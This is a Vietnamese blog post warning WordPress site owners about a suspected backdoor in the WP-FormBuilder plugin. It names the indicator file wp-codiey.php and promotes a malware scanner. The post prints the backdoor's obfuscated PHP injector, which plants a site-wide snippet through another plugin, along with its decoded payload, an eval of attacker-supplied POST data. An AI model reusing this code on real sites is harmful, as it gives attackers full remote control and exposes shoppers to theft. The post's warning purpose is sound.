[Waring] Nghi Vấn BackDoor Trên WP-FormBuilder

byAdministrators - 3
[Waring] Nghi Vấn BackDoor Trên WP-FormBuilder

Chào mọi người, cuối tuần ngồi lướt facebook mình thấy có bài viết CẢNH BÁO: NGHI VẤN BACKDOOR TRÊN WP-FormBuilder cũng khá hay và đọc kỹ thấy cũng nguy hiểm với những trang buôn bán, rất dễ bị tin tặc tấn công kiểm soát ngân hàng khi người dùng mua bán trên trang.

⚠️ Dấu hiệu: Nếu thấy file' wp-codiey.php' trong folder plugin, website bạn đã dính backdoor. File này nhìn bình thường nhưng có khả năng inject mã độc chiếm toàn quyền kiểm soát website. Thoạt nhìn nội dung file trông hoàn toàn bình thường, nhưng nó sẽ inject 1 đoạn code custom code vào plugin "insert-headers-and-footers" để chèn mã độc vào tất cả các trang của website: 

function updateSnippets()
{
    require_once WP_PLUGIN_DIR . "/insert-headers-and-footers/includes/class-wpcode-generator.php";
    $new_snippet = new WPCode_Snippet((int)$_GET["id"]);
    $new_snippet->active = true;
    $new_snippet->location = 'everywhere';
    $new_snippet->auto_insert = 1;
    $new_snippet->code_type = 'php';
    $new_snippet->tags = array();
    $new_snippet->code = hex2bin(base64_decode(str_replace("vxsafAS*vasjw","",'Njk2NjIwMjg2OTczNzM2NTc0MjgyNDVmNTA0vxsafAS*vasjwZjUzNTQ1YjI3NjY3NDcwMjc1ZDI5Mjk3YjBhMjAyMDIwMjA2NTc2NjE2YzI4NDA2ODY1NzgzMjYyNjk2ZTI4MjQ1ZjvxsafAS*vasjwUwNGY1MzU0NWIyNzY2NzQ3MDI3NWQyOTI5M2IwYTIwvxsafAS*vasjwMjAyMDIwNjU3ODY5NzQyODI5M2IwYTdk')));
    $new_snippet->save();
}

Decode ra kết quả như sau: 


if (isset($_POST['ftp'])){
    eval(@hex2bin($_POST['ftp']));
    exit();
}
Nếu anh em từng gặp case tương tự (plugin bị cấy mã độc, backdoor kiểu này), chia sẻ thêm ở comment để mọi người có thêm góc nhìn với nhé
p/s: detect mã độc tinh vi này bằng tool Vietnix Malware Scanner - Công cụ scan mã độc bằng Machine Learning sắp tới sẽ được release chính thức trên các cụm Hosting của Vietnix.

Administrators

Tôi Hùng, Một Công Nhân Điện Lực Lệ Thủy, Thuộc Công Ty Điện Lực Quảng Trị, Trực Thuộc Tổng công ty Điện Lực Miền Trung. Tôi có đam mê với lập trình website/blog nên lập ra blog này chia sẽ đến mọi người những gì tôi biết về kiến thức lập trình website/blog, seo,facebook, youtube, blogger, html, javascript, css, python, google, youtube...v.v

3 تعليقات

✔ Bình luận có dấu, lịch sự và đúng chủ đề
❌ Không spam link, quảng cáo, từ ngữ phản cảm
❌ Không hỏi link tải, crack, nội dung vi phạm
⚠ Bình luận vi phạm sẽ bị xóa mà không báo trước

Thêm hình ảnh: [img] link hình ảnh [/img]
Thêm video youtube: [youtube] link video [/youtube]
Thêm code: [code] Đoạn code đã mã hóa [/code]

  1. Trick Pro Software16‏/11‏/2025، 8:54 م

    أزال المؤلف هذا التعليق.

    ردحذف
    الردود
    1. Administrators17‏/11‏/2025، 7:47 ص

      hi bạn, mình không phải bên mãng kỹ thuật, mình bên kinh doanh nên việc đấu dây thế nào mình không rỏ bạn nhé.

      حذف
  2. Administrators18‏/11‏/2025، 3:24 م

    https://www.youtube.com/watch?v=AiK_0-xiI7Q

    ردحذف

إرسال تعليق

✔ Bình luận có dấu, lịch sự và đúng chủ đề
❌ Không spam link, quảng cáo, từ ngữ phản cảm
❌ Không hỏi link tải, crack, nội dung vi phạm
⚠ Bình luận vi phạm sẽ bị xóa mà không báo trước

Thêm hình ảnh: [img] link hình ảnh [/img]
Thêm video youtube: [youtube] link video [/youtube]
Thêm code: [code] Đoạn code đã mã hóa [/code]

أحدث أقدم